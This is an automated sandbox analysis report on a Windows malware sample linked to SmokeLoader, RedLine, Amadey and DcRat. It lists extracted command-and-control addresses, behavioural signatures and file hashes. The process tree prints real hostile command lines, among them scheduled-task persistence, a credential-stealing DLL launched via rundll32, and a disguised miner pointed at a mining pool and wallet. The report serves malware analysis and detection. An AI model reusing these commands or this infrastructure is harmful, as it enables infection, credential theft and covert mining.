Analysis
-
max time kernel
143s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
01/11/2022, 11:41
Static task
static1
Behavioral task
behavioral1
Sample
6ddf800f1c10179bdbe0e543c6641349.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
6ddf800f1c10179bdbe0e543c6641349.exe
Resource
win10v2004-20220901-en
General
-
Target
6ddf800f1c10179bdbe0e543c6641349.exe
-
Size
321KB
-
MD5
6ddf800f1c10179bdbe0e543c6641349
-
SHA1
e3e326b2ee9dc20c7a82920f8a8b67bac2350472
-
SHA256
ca19c8ccb6a6b25ef286ee0f5a82abc186290cbacd427371584ce2ac65501d9c
-
SHA512
3b9a8ae3162cc3db87889a63ca1949170ce0672f3cffc8eeabbc3d027a5e0bb53557e9f616bbb7e912716d1fd4a4b16b7f2e61a887c81b8f3e300d2a64087f7d
-
SSDEEP
3072:d9NwJSdDV5Uu4vG9AN6cqY0l+qeDQlsAlaA3RvLSSuUX+VggjcGkNIVqIh7:lwJSd4B+RcJLQbPhvLSSuUm7ITsq
Malware Config
Extracted
redline
slovarik15btc
78.153.144.3:2510
-
auth_value
bfedad55292538ad3edd07ac95ad8952
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Amadey credential stealer module 2 IoCs
resource yara_rule behavioral2/files/0x000f00000001f020-268.dat amadey_cred_module behavioral2/files/0x000f00000001f020-269.dat amadey_cred_module -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral2/memory/4348-133-0x00000000001F0000-0x00000000001F9000-memory.dmp family_smokeloader -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/1632-140-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/4024-243-0x0000000000600000-0x0000000000628000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 49 3860 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 4488 4362.exe 4812 539F.exe 3372 57A7.exe 3104 5A58.exe 4176 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 2228 66AD.exe 4312 69DB.exe 1744 LYKAA.exe 2124 rovwer.exe 3488 rovwer.exe -
resource yara_rule behavioral2/files/0x000c00000001e806-178.dat upx behavioral2/files/0x000c00000001e806-179.dat upx behavioral2/memory/2228-184-0x0000000000220000-0x0000000000A09000-memory.dmp upx behavioral2/memory/2228-237-0x0000000000220000-0x0000000000A09000-memory.dmp upx -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 5A58.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation LYKAA.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 69DB.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation rovwer.exe -
Loads dropped DLL 4 IoCs
pid Process 4640 InstallUtil.exe 4640 InstallUtil.exe 4640 InstallUtil.exe 3860 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4488 set thread context of 1632 4488 4362.exe 93 PID 4812 set thread context of 4640 4812 539F.exe 99 PID 3372 set thread context of 4024 3372 57A7.exe 126 PID 1744 set thread context of 5024 1744 LYKAA.exe 127 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 4712 4312 WerFault.exe 104 1676 3488 WerFault.exe 125 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6ddf800f1c10179bdbe0e543c6641349.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6ddf800f1c10179bdbe0e543c6641349.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6ddf800f1c10179bdbe0e543c6641349.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2572 schtasks.exe 1500 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4396 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4348 6ddf800f1c10179bdbe0e543c6641349.exe 4348 6ddf800f1c10179bdbe0e543c6641349.exe 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 4348 6ddf800f1c10179bdbe0e543c6641349.exe 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found 2756 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeDebugPrivilege 4176 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeDebugPrivilege 1744 LYKAA.exe Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeDebugPrivilege 1632 vbc.exe Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeDebugPrivilege 4024 vbc.exe Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found Token: SeShutdownPrivilege 2756 Process not Found Token: SeCreatePagefilePrivilege 2756 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2756 wrote to memory of 4488 2756 Process not Found 90 PID 2756 wrote to memory of 4488 2756 Process not Found 90 PID 2756 wrote to memory of 4488 2756 Process not Found 90 PID 4488 wrote to memory of 1632 4488 4362.exe 93 PID 4488 wrote to memory of 1632 4488 4362.exe 93 PID 4488 wrote to memory of 1632 4488 4362.exe 93 PID 4488 wrote to memory of 1632 4488 4362.exe 93 PID 4488 wrote to memory of 1632 4488 4362.exe 93 PID 2756 wrote to memory of 4812 2756 Process not Found 94 PID 2756 wrote to memory of 4812 2756 Process not Found 94 PID 2756 wrote to memory of 4812 2756 Process not Found 94 PID 2756 wrote to memory of 3372 2756 Process not Found 95 PID 2756 wrote to memory of 3372 2756 Process not Found 95 PID 2756 wrote to memory of 3372 2756 Process not Found 95 PID 2756 wrote to memory of 3104 2756 Process not Found 97 PID 2756 wrote to memory of 3104 2756 Process not Found 97 PID 3104 wrote to memory of 4176 3104 5A58.exe 98 PID 3104 wrote to memory of 4176 3104 5A58.exe 98 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4812 wrote to memory of 4640 4812 539F.exe 99 PID 4176 wrote to memory of 4632 4176 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 100 PID 4176 wrote to memory of 4632 4176 sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe 100 PID 4632 wrote to memory of 4396 4632 cmd.exe 102 PID 4632 wrote to memory of 4396 4632 cmd.exe 102 PID 2756 wrote to memory of 2228 2756 Process not Found 103 PID 2756 wrote to memory of 2228 2756 Process not Found 103 PID 2756 wrote to memory of 4312 2756 Process not Found 104 PID 2756 wrote to memory of 4312 2756 Process not Found 104 PID 2756 wrote to memory of 4312 2756 Process not Found 104 PID 2228 wrote to memory of 4308 2228 66AD.exe 105 PID 2228 wrote to memory of 4308 2228 66AD.exe 105 PID 2756 wrote to memory of 1480 2756 Process not Found 107 PID 2756 wrote to memory of 1480 2756 Process not Found 107 PID 2756 wrote to memory of 1480 2756 Process not Found 107 PID 2756 wrote to memory of 1480 2756 Process not Found 107 PID 4632 wrote to memory of 1744 4632 cmd.exe 108 PID 4632 wrote to memory of 1744 4632 cmd.exe 108 PID 2756 wrote to memory of 4636 2756 Process not Found 109 PID 2756 wrote to memory of 4636 2756 Process not Found 109 PID 2756 wrote to memory of 4636 2756 Process not Found 109 PID 1744 wrote to memory of 3892 1744 LYKAA.exe 110 PID 1744 wrote to memory of 3892 1744 LYKAA.exe 110 PID 2756 wrote to memory of 1296 2756 Process not Found 112 PID 2756 wrote to memory of 1296 2756 Process not Found 112 PID 2756 wrote to memory of 1296 2756 Process not Found 112 PID 2756 wrote to memory of 1296 2756 Process not Found 112 PID 3892 wrote to memory of 2572 3892 cmd.exe 113 PID 3892 wrote to memory of 2572 3892 cmd.exe 113 PID 2756 wrote to memory of 4808 2756 Process not Found 114 PID 2756 wrote to memory of 4808 2756 Process not Found 114 PID 2756 wrote to memory of 4808 2756 Process not Found 114 PID 2756 wrote to memory of 1488 2756 Process not Found 115 PID 2756 wrote to memory of 1488 2756 Process not Found 115 PID 2756 wrote to memory of 1488 2756 Process not Found 115 PID 2756 wrote to memory of 1488 2756 Process not Found 115 PID 4312 wrote to memory of 2124 4312 69DB.exe 116 PID 4312 wrote to memory of 2124 4312 69DB.exe 116 PID 4312 wrote to memory of 2124 4312 69DB.exe 116 -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6ddf800f1c10179bdbe0e543c6641349.exe"C:\Users\Admin\AppData\Local\Temp\6ddf800f1c10179bdbe0e543c6641349.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4348
-
C:\Users\Admin\AppData\Local\Temp\4362.exeC:\Users\Admin\AppData\Local\Temp\4362.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Users\Admin\AppData\Local\Temp\539F.exeC:\Users\Admin\AppData\Local\Temp\539F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Loads dropped DLL
PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\57A7.exeC:\Users\Admin\AppData\Local\Temp\57A7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\5A58.exeC:\Users\Admin\AppData\Local\Temp\5A58.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe"C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6040.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:4396
-
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
PID:2572
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 65⤵PID:5024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1828
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\66AD.exeC:\Users\Admin\AppData\Local\Temp\66AD.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\cmd.execmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\66AD.exe"2⤵PID:4308
-
-
C:\Users\Admin\AppData\Local\Temp\69DB.exeC:\Users\Admin\AppData\Local\Temp\69DB.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
PID:2124 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F3⤵
- Creates scheduled task(s)
PID:1500
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:3860
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 11402⤵
- Program crash
PID:4712
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1480
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4636
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1296
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4808
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4312 -ip 43121⤵PID:3440
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3220
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1756
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1528
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exeC:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe1⤵
- Executes dropped EXE
PID:3488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 4202⤵
- Program crash
PID:1676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3488 -ip 34881⤵PID:884
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
837KB
MD59796f845b710c1e68ee9f93592503665
SHA19be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51
SHA2562c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f
SHA512c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135
-
Filesize
837KB
MD59796f845b710c1e68ee9f93592503665
SHA19be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51
SHA2562c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f
SHA512c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135
-
Filesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
Filesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
Filesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
Filesize
2KB
MD55c9237df35c69a284b3cfd66970ce736
SHA16c25b1319637046c663d18e36bdafbb6f5cadf00
SHA256b4a0eea59921d24fe0f743c96ed5322c79af4c22d37c16f62bdba777c6be717e
SHA51201dcd3afd5f4d395299ad2b8f8c41c1b39422486274d0a95c0f4e187b38d75ff40fce896815fa9dc05b2d66403ae83a697cb43927271f0eb1de28d78163dcc06
-
Filesize
366KB
MD5287572edc287d01d1e625d3b93efa326
SHA11ed75fcfe9a37ba94ab8c59bf5048b1a85932857
SHA256b6c62694edd72c240d022a7a33276ee091fa986437f571c50a34fd67c9b44e45
SHA51202994440785ec5347fd4f0895d674456f360ef43bc2ed96502cce72210600ff0af912ce169d66716893ccdb1a6894d2a7c2c6715b0652178fbb0535962e170e9
-
Filesize
366KB
MD5287572edc287d01d1e625d3b93efa326
SHA11ed75fcfe9a37ba94ab8c59bf5048b1a85932857
SHA256b6c62694edd72c240d022a7a33276ee091fa986437f571c50a34fd67c9b44e45
SHA51202994440785ec5347fd4f0895d674456f360ef43bc2ed96502cce72210600ff0af912ce169d66716893ccdb1a6894d2a7c2c6715b0652178fbb0535962e170e9
-
Filesize
1.2MB
MD5b67545f8f9bcc95c2efca01d65d4c429
SHA1062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf
SHA2565c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4
SHA5124ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563
-
Filesize
1.2MB
MD5b67545f8f9bcc95c2efca01d65d4c429
SHA1062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf
SHA2565c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4
SHA5124ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563
-
Filesize
366KB
MD5b6f73df0d1c7d5fef86b5f3034767901
SHA10bc4f94c5100cbfae5c520ca7b541c3c86d528f3
SHA25682a405a195eb3815d8a5ead1c6271cb279f7dbc11abebb7129b59561ad36e4b2
SHA512196c7c0321c6f35f9222d278fa226c9a5b28d5bdb22636be1a365db3f18d37c12371dff9881324244bd284cc764e257744b1d134860ce4485d4b3c8dc74b5f8a
-
Filesize
366KB
MD5b6f73df0d1c7d5fef86b5f3034767901
SHA10bc4f94c5100cbfae5c520ca7b541c3c86d528f3
SHA25682a405a195eb3815d8a5ead1c6271cb279f7dbc11abebb7129b59561ad36e4b2
SHA512196c7c0321c6f35f9222d278fa226c9a5b28d5bdb22636be1a365db3f18d37c12371dff9881324244bd284cc764e257744b1d134860ce4485d4b3c8dc74b5f8a
-
Filesize
1.1MB
MD53cbeec829f400bbc837e6cedf044a6cb
SHA1b6906942e53a1482069c123ca7f127cdf50c25fc
SHA256f2ba48f9b1da2b3971f2e70b772a4d6fc503eb4b890fca1923b322687b77dd9f
SHA512285f08009934e530ef37b1c98097e7ab1134943e0796fbc0413883e367110aa1d4f14f5ed242b9386d8677e2cbc3000bbe3ccea5ac27b0aa72128425c8106806
-
Filesize
1.1MB
MD53cbeec829f400bbc837e6cedf044a6cb
SHA1b6906942e53a1482069c123ca7f127cdf50c25fc
SHA256f2ba48f9b1da2b3971f2e70b772a4d6fc503eb4b890fca1923b322687b77dd9f
SHA512285f08009934e530ef37b1c98097e7ab1134943e0796fbc0413883e367110aa1d4f14f5ed242b9386d8677e2cbc3000bbe3ccea5ac27b0aa72128425c8106806
-
Filesize
2.8MB
MD5e654228f62c81cfa6da658858a46ccff
SHA16926e074d206a7f1bdab2a5c4f374c75338a4a93
SHA256e22ad0212d094263e07e449bb8370760dbeed1a89ad76b485ea7f072694d4003
SHA512bd2dbe69fc707b3090625af3a7dd226060712f2185a0ffdfa9229ccca085e4159b3832cb0ac45c9d80cd3f8521a89164a150966fbbee210c984e24ffb4b75a0a
-
Filesize
2.8MB
MD5e654228f62c81cfa6da658858a46ccff
SHA16926e074d206a7f1bdab2a5c4f374c75338a4a93
SHA256e22ad0212d094263e07e449bb8370760dbeed1a89ad76b485ea7f072694d4003
SHA512bd2dbe69fc707b3090625af3a7dd226060712f2185a0ffdfa9229ccca085e4159b3832cb0ac45c9d80cd3f8521a89164a150966fbbee210c984e24ffb4b75a0a
-
Filesize
359KB
MD52d71178035cc220c79f00a8fdd2df64b
SHA1fb289a0637c798844126c4ee726f013b9b971270
SHA25658036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
SHA5124d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf
-
Filesize
359KB
MD52d71178035cc220c79f00a8fdd2df64b
SHA1fb289a0637c798844126c4ee726f013b9b971270
SHA25658036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
SHA5124d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf
-
Filesize
359KB
MD52d71178035cc220c79f00a8fdd2df64b
SHA1fb289a0637c798844126c4ee726f013b9b971270
SHA25658036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
SHA5124d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf
-
Filesize
359KB
MD52d71178035cc220c79f00a8fdd2df64b
SHA1fb289a0637c798844126c4ee726f013b9b971270
SHA25658036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
SHA5124d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf
-
Filesize
359KB
MD52d71178035cc220c79f00a8fdd2df64b
SHA1fb289a0637c798844126c4ee726f013b9b971270
SHA25658036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
